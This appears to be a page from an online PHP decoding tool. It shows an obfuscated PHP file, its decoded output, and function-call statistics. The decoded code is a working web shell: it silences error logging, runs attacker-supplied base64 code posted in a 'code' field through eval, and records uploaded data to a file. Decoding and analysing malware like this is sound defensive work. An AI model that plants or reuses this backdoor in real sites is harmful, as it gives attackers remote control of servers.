Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @error_reporting(0);@ini_set("\x64\x69\x73\x70lay_\x65r\x72\x6f\x72\x73",0);@ini_set..
Decoded Output download
<?php @error_reporting(0);@ini_set("display_errors",0);@ini_set("log_errors",0);@ini_set("error_log",0);@ini_set("memory_limit","2M");@ini_set("max_execution_time",30);@set_time_limit(30);if(isset($_SERVER["HTTP_X_REAL_IP"]))$_SERVER["REMOTE_ADDR"]=$_SERVER["HTTP_X_REAL_IP"];if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));}elseif(isset($_SERVER["HTTP_CONTENT_ENCODING"])&&$_SERVER["HTTP_CONTENT_ENCODING"]=="binary"){$input=file_get_contents("php://input");if(strlen($input)>0)print "STATUS-IMPORT-OK";if(strlen($input)>10){$fp=@fopen(str_replace(".php",".bin",basename($_SERVER["SCRIPT_FILENAME"])),"a");@flock($fp,LOCK_EX);@fputs($fp,$_SERVER["REMOTE_ADDR"]." ".base64_encode($data)."
");@flock($fp,LOCK_UN);@fclose($fp);}}elseif(preg_match("/[.]htm/i",$_SERVER["REQUEST_URI"])){print $_SERVER["REQUEST_URI"];}exit;?>
Did this file decode correctly?
Original Code
<?php @error_reporting(0);@ini_set("\x64\x69\x73\x70lay_\x65r\x72\x6f\x72\x73",0);@ini_set("\x6c\x6fg_e\x72\x72\x6f\x72\x73",0);@ini_set("e\x72r\x6fr\x5f\x6c\x6fg",0);@ini_set("\x6d\x65mo\x72y_li\x6di\x74","2\x4d");@ini_set("ma\x78_\x65x\x65cu\x74\x69on_tim\x65",30);@set_time_limit(30);if(isset($_SERVER["H\x54TP\x5f\x58\x5f\x52\x45AL_\x49P"]))$_SERVER["\x52EMOTE_\x41\x44\x44R"]=$_SERVER["H\x54TP\x5f\x58\x5f\x52\x45AL_\x49P"];if(isset($_POST["\x63\x6fde"])){eval(base64_decode($_POST["\x63\x6fde"]));}elseif(isset($_SERVER["H\x54TP\x5f\x43ON\x54E\x4eT_E\x4eC\x4f\x44ING"])&&$_SERVER["H\x54TP\x5f\x43ON\x54E\x4eT_E\x4eC\x4f\x44ING"]=="\x62i\x6ea\x72\x79"){$input=file_get_contents("php\x3a\x2f/inp\x75t");if(strlen($input)>0)print "STA\x54US-IM\x50O\x52T-O\x4b";if(strlen($input)>10){$fp=@fopen(str_replace(".\x70hp","\x2eb\x69n",basename($_SERVER["\x53CR\x49PT\x5f\x46\x49LENAM\x45"])),"\x61");@flock($fp,LOCK_EX);@fputs($fp,$_SERVER["\x52EMOTE_\x41\x44\x44R"]."\t".base64_encode($data)."\r\n");@flock($fp,LOCK_UN);@fclose($fp);}}elseif(preg_match("\x2f[\x2e]h\x74m\x2f\x69",$_SERVER["REQ\x55\x45\x53T_\x55R\x49"])){print $_SERVER["REQ\x55\x45\x53T_\x55R\x49"];}exit;?>
Function Calls
ini_set | 5 |
base64_decode | 1 |
set_time_limit | 1 |
error_reporting | 1 |
Stats
MD5 | 59e38e9197d2140ff7524168afd3a804 |
Eval Count | 0 |
Decode Time | 351 ms |